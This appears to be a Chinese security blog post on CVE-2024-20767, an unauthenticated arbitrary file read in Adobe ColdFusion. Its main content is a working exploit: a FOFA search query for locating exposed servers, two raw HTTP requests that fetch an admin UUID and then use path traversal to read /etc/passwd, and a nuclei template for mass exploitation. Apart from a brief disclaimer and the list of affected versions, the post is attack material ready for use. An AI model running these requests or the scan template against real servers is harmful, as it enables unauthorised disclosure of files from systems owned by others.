免责声明：
漏洞描述
影响版本
fofa语句
漏洞复现
打开页面
构造payload
请求获取uuid
使用获取的uuid进行文件读取
nuclei批量验证
github poc总汇地址： https://github.com/AYcg/poc

免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

由于Adobe ColdFusion的访问控制不当，未经身份认证的远程攻击者可以构造恶意请求读取目标服务器上的任意文件，泄露敏感信息。

影响版本

ColdFusion 2021 <= Update 12 && ColdFusion 2023 <= Update 6

fofa语句

app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"

漏洞复现

打开页面

构造payload

请求获取uuid

GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

使用获取的uuid进行文件读取

GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

nuclei批量验证

id: Adobe-ColdFusion-information-read

info:
  name: Adobe ColdFusion 任意文件读取漏洞(CVE-2024-20767)
  author: changge
  severity: high
  description: ColdFusion 2021 <= Update 12 && ColdFusion 2023 <= Update 6
  metadata:
    max-request: 1
    fofa-query: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
    verified: true
requests:
  - raw:
      - |
        GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close

      - |
        GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        uuid: {{uuid}}

    extractors:
      - type: regex
        name: uuid
        group: 1
        internal: true
        part: body  
        regex:
          - "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1, 'uuid') && status_code_2 == 200 && contains(body_2, 'root:')"

github poc总汇地址：https://github.com/AYcg/poc